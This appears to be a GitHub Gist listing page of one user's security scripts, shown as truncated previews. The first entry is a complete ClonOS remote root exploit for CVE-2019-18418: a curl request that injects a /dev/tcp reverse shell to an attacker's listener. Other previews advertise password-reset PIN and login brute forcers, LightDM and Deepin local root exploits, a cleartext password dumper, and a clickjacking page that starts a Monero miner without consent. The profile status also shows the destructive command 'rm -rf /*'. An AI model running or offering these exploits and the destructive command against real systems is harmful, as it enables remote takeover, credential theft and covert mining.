bcoles
💭 `rm -rf /*`

bcoles / clonos-root-rce.sh
Last active Nov 4, 2019
Trivial ClonOs remote root RCE exploit for CVE-2019-18418
#!/bin/bash
# clonos-root-rce
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
# Note: Start netcat listener on LHOST:LPORT first
RHOST="172.16.191.240"
LHOST="172.16.191.165"
LPORT=1337
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"

bcoles / jellyfin-brute.rb
Created Aug 21, 2019
Jellyfin Password Reset PIN Brute Force
#!/usr/bin/env ruby
################################################################################
# Jellyfin Password Reset PIN Brute Force                                      #
#                                                                              #
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2.   #
# This will likely also work on Emby Media Server, but untested.               #
#                                                                              #
# Note: cURL must be installed and in $PATH                                    #
#                                                                              #
# Note: Upon successful exploitation, the password will be reset for all users, #

bcoles / lightdmpwn.sh
Created Sep 19, 2018
Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
#!/bin/bash
# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
# ---
# Usage: ./lightpwn
# A LightDM session is required. Exploitation will lock the current session,
# and could take several minutes. It usually takes about a minute.
# When the screen stops flashing, unlock the session and run: /bin/subash
# ---
# There's nothing new or special about this exploit.
# It's simply a slightly more weaponised version of the original PoC,

bcoles / lastore-daemon-root.sh
Created Mar 24, 2018
Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#!/bin/bash
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
#
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/

bcoles / lightdmdump
Created Mar 11, 2018
Dump clear text passwords from lightdm sessions on Ubuntu
#!/bin/bash
# lightdmdump
# ---
# Dump clear text passwords from lightdm sessions on Ubuntu
# Requires root privileges to dump lightdm process memory
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS
# ---
# Bug discovered by: Sven Blumenstein
# Disclosure date: 2017-09-15
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490

bcoles / crt.sh
Created Mar 8, 2018
List sub-domains using crt.sh
#!/bin/bash
# List sub-domains using crt.sh
set -euo pipefail
IFS=$'\n\t'
error() {
  echo "[ERROR] $*"
  exit 1
}

bcoles / fuzz.rb
Created Nov 18, 2017
Fuzz Origami Ruby gem with mutated PDF files
#!/usr/bin/env ruby
###################################################
# ----------------------------------------------- #
# Fuzz Origami Ruby gem with mutated PDF files    #
# ----------------------------------------------- #
#                                                 #
# Each test case is written to 'fuzz.pdf' in the  #
# current working directory.                      #
#                                                 #
# Crashes and the associated backtrace are saved  #

bcoles / clickjack-authedmine.html
Created Oct 21, 2017
Start the AuthedMine JavaScript Monero miner without user consent (using clickjacking)
<html>
  <body>
    <div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
      <iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
    </div>
  </body>
  <script>
    window.onmousemove = function(e) {
      var container = document.getElementById("container");

bcoles / cain-wifi-export-to-csv.rb
Created Aug 5, 2017
Cain Wireless Scanner export to CSV
#!/usr/bin/env ruby
################################################################################
# Cain Wireless Scanner export to CSV                                          #
# -----------------------------------                                          #
# This script takes a text file of wireless networks exported from Cain        #
# and converts it to CSV.                                                      #
################################################################################
# ~ bcoles
require 'csv'

bcoles / brute-teamtalk.rb
Created Jul 22, 2017
BearWare TeamTalk login brute force
#!/usr/bin/env ruby
################################################################################
# BearWare TeamTalk login brute force                                          #
#                                                                              #
# Tested on TeamTalk versions 5.2.2.4885 and 5.2.3.4893                        #
#                                                                              #
# Note: SSL support is implemented but untested                                #
################################################################################
# ~ bcoles